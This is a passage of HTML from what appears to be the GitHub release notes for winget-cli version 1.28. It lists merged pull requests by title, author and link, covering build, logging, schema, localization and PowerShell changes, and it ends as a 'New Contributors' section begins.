<li>Improve window thread termination by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3497595140" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5781" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5781/hovercard" href="https://github.com/microsoft/winget-cli/pull/5781">#5781</a></li>
<li>Fix portable installer issues when installing to non ascii path by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yao-msft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yao-msft">@yao-msft</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3500476031" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5788" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5788/hovercard" href="https://github.com/microsoft/winget-cli/pull/5788">#5788</a></li>
<li>Remove experimental from Font Install, Uninstall, and source by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3500835567" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5791" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5791/hovercard" href="https://github.com/microsoft/winget-cli/pull/5791">#5791</a></li>
<li>Update NOTICE by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3511592613" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5801" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5801/hovercard" href="https://github.com/microsoft/winget-cli/pull/5801">#5801</a></li>
<li>Update localized strings by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3514675035" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5805" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5805/hovercard" href="https://github.com/microsoft/winget-cli/pull/5805">#5805</a></li>
<li>Bump version to 1.28 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3500474102" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5787" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5787/hovercard" href="https://github.com/microsoft/winget-cli/pull/5787">#5787</a></li>
<li>Move to latest 7.4 PS SDK by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3519731252" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5811" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5811/hovercard" href="https://github.com/microsoft/winget-cli/pull/5811">#5811</a></li>
<li>Enable MultiProcessorCompilation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3512401468" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5804" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5804/hovercard" href="https://github.com/microsoft/winget-cli/pull/5804">#5804</a></li>
<li>Remove mention of WinGet Insider program from the README by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3558459633" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5832" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5832/hovercard" href="https://github.com/microsoft/winget-cli/pull/5832">#5832</a></li>
<li>Ignore ReleaseStatic outputs and clean intermediates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3572615072" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5848" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5848/hovercard" href="https://github.com/microsoft/winget-cli/pull/5848">#5848</a></li>
<li>Make Repair-WGPM a COM-aware cmdlet and rework version retrieval by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3568289044" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5842" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5842/hovercard" href="https://github.com/microsoft/winget-cli/pull/5842">#5842</a></li>
<li>Unregister signal handler by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3593025660" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5861" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5861/hovercard" href="https://github.com/microsoft/winget-cli/pull/5861">#5861</a></li>
<li>Support associating export units with packages in subdirectories of install location by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3588654688" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5859" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5859/hovercard" href="https://github.com/microsoft/winget-cli/pull/5859">#5859</a></li>
<li>Send host geo to sandbox by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3617875168" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5873" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5873/hovercard" href="https://github.com/microsoft/winget-cli/pull/5873">#5873</a></li>
<li>Update C++ nuget package references using new scripts by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3623390985" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5877" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5877/hovercard" href="https://github.com/microsoft/winget-cli/pull/5877">#5877</a></li>
<li>Update platform toolset by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3627539923" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5882" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5882/hovercard" href="https://github.com/microsoft/winget-cli/pull/5882">#5882</a></li>
<li>Extract event log for potential crash info by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3518633143" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5807" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5807/hovercard" href="https://github.com/microsoft/winget-cli/pull/5807">#5807</a></li>
<li>Update CODEOWNERS to include winget-developers by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3649373914" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5891" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5891/hovercard" href="https://github.com/microsoft/winget-cli/pull/5891">#5891</a></li>
<li>Fixes for VS2026 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3665007222" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5896" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5896/hovercard" href="https://github.com/microsoft/winget-cli/pull/5896">#5896</a></li>
<li>Additional logging limitations and control by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3639765799" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5888" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5888/hovercard" href="https://github.com/microsoft/winget-cli/pull/5888">#5888</a></li>
<li>Use hybrid CRT linkage instead of full static by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3713123433" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5913" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5913/hovercard" href="https://github.com/microsoft/winget-cli/pull/5913">#5913</a></li>
<li>Enable source reference to get thread globals for off-thread logging by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3496366336" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5780" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5780/hovercard" href="https://github.com/microsoft/winget-cli/pull/5780">#5780</a></li>
<li>Fix JSON, missing closing brace by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/doterik/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/doterik">@doterik</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3725749076" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5924" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5924/hovercard" href="https://github.com/microsoft/winget-cli/pull/5924">#5924</a></li>
<li>Test host for in-proc COM module validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3700306254" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5910" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5910/hovercard" href="https://github.com/microsoft/winget-cli/pull/5910">#5910</a></li>
<li>Add sleep to allow background threads to quiesce by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3736500167" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5933" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5933/hovercard" href="https://github.com/microsoft/winget-cli/pull/5933">#5933</a></li>
<li>Allow suppressing configuration output on test by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3503762781" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5794" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5794/hovercard" href="https://github.com/microsoft/winget-cli/pull/5794">#5794</a></li>
<li>Enable Explicit toggling for sources (i.e. Enable/Disable) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3682063243" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5904" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5904/hovercard" href="https://github.com/microsoft/winget-cli/pull/5904">#5904</a></li>
<li>Fix fuzz build by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3736419630" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5932" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5932/hovercard" href="https://github.com/microsoft/winget-cli/pull/5932">#5932</a></li>
<li>Normalize directory separators when adding packages to path by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3504149438" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5796" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5796/hovercard" href="https://github.com/microsoft/winget-cli/pull/5796">#5796</a></li>
<li>Add sleep to another inproc test by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3740622150" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5935" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5935/hovercard" href="https://github.com/microsoft/winget-cli/pull/5935">#5935</a></li>
<li>Don't build inproc testbed for fuzzing by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3745058247" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5937" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5937/hovercard" href="https://github.com/microsoft/winget-cli/pull/5937">#5937</a></li>
<li>Create schema 1.12.0 folder by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3757864843" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5944" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5944/hovercard" href="https://github.com/microsoft/winget-cli/pull/5944">#5944</a></li>
<li>Fix names of 1.12 Schemas by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3757909234" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5945" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5945/hovercard" href="https://github.com/microsoft/winget-cli/pull/5945">#5945</a></li>
<li>Fix Font feature property name by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3758021326" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5946" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5946/hovercard" href="https://github.com/microsoft/winget-cli/pull/5946">#5946</a></li>
<li>Add check to ensure vcpkg triplets match across projects by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3771462095" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5950" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5950/hovercard" href="https://github.com/microsoft/winget-cli/pull/5950">#5950</a></li>
<li>Update release notes for v1.28 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3786109953" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5957" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5957/hovercard" href="https://github.com/microsoft/winget-cli/pull/5957">#5957</a></li>
<li>Details output option for <code>list</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3748529639" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5939" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5939/hovercard" href="https://github.com/microsoft/winget-cli/pull/5939">#5939</a></li>
<li>PowerShell Repair enhancements by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AmelBawa-msft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AmelBawa-msft">@AmelBawa-msft</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3395519393" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5711" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5711/hovercard" href="https://github.com/microsoft/winget-cli/pull/5711">#5711</a></li>
<li>Allow inproc callers to disable termination signal handlers by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3789855368" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5958" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5958/hovercard" href="https://github.com/microsoft/winget-cli/pull/5958">#5958</a></li>
<li>Add manifest version to WinGetUtilInterop by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/msftrubengu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/msftrubengu">@msftrubengu</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3794767294" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5964" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5964/hovercard" href="https://github.com/microsoft/winget-cli/pull/5964">#5964</a></li>
<li>Fixes for updating winget from winget by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3806959508" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5972" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5972/hovercard" href="https://github.com/microsoft/winget-cli/pull/5972">#5972</a></li>
<li>Diagnostics and fix for pipeline test failures by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3810295053" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5975" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5975/hovercard" href="https://github.com/microsoft/winget-cli/pull/5975">#5975</a></li>
<li>Escape caller in user agent header by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3840346247" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5998" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5998/hovercard" href="https://github.com/microsoft/winget-cli/pull/5998">#5998</a></li>
<li>Add DSC resource list to manifest by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3839410468" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5997" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5997/hovercard" href="https://github.com/microsoft/winget-cli/pull/5997">#5997</a></li>
<li>Add command builder with escaped user input by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AmelBawa-msft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AmelBawa-msft">@AmelBawa-msft</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3817973099" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5982" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5982/hovercard" href="https://github.com/microsoft/winget-cli/pull/5982">#5982</a></li>
<li>Add missing closing brace in settings.export.schema.0.1.json by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DuckDuckStudio/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DuckDuckStudio">@DuckDuckStudio</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3853198617" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6004" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6004/hovercard" href="https://github.com/microsoft/winget-cli/pull/6004">#6004</a></li>
<li>Turn off PWSH UT build in Fuzzing and ReleaseStatic for all platforms by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AmelBawa-msft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AmelBawa-msft">@AmelBawa-msft</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3857311162" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6005" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6005/hovercard" href="https://github.com/microsoft/winget-cli/pull/6005">#6005</a></li>
<li>Remove experimental feature gate on source edit by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3857921476" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6006" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6006/hovercard" href="https://github.com/microsoft/winget-cli/pull/6006">#6006</a></li>
<li>Update ReleaseNotes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3862674095" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6007" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6007/hovercard" href="https://github.com/microsoft/winget-cli/pull/6007">#6007</a></li>
<li>Make list details stable (1.28) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3889711357" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6021" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6021/hovercard" href="https://github.com/microsoft/winget-cli/pull/6021">#6021</a></li>
<li>Move to IReference rather than custom enum for optional bool (1.28) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3893659251" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6024" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6024/hovercard" href="https://github.com/microsoft/winget-cli/pull/6024">#6024</a></li>
<li>Apply latest localization patch (1.28) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3893720482" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6025" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6025/hovercard" href="https://github.com/microsoft/winget-cli/pull/6025">#6025</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mohiuddin-khan-shiam/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mohiuddin-khan-shiam">@mohiuddin-khan-shiam</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3186146724" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5564" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5564/hovercard" href="https://github.com/microsoft/winget-cli/pull/5564">#5564</a></li>
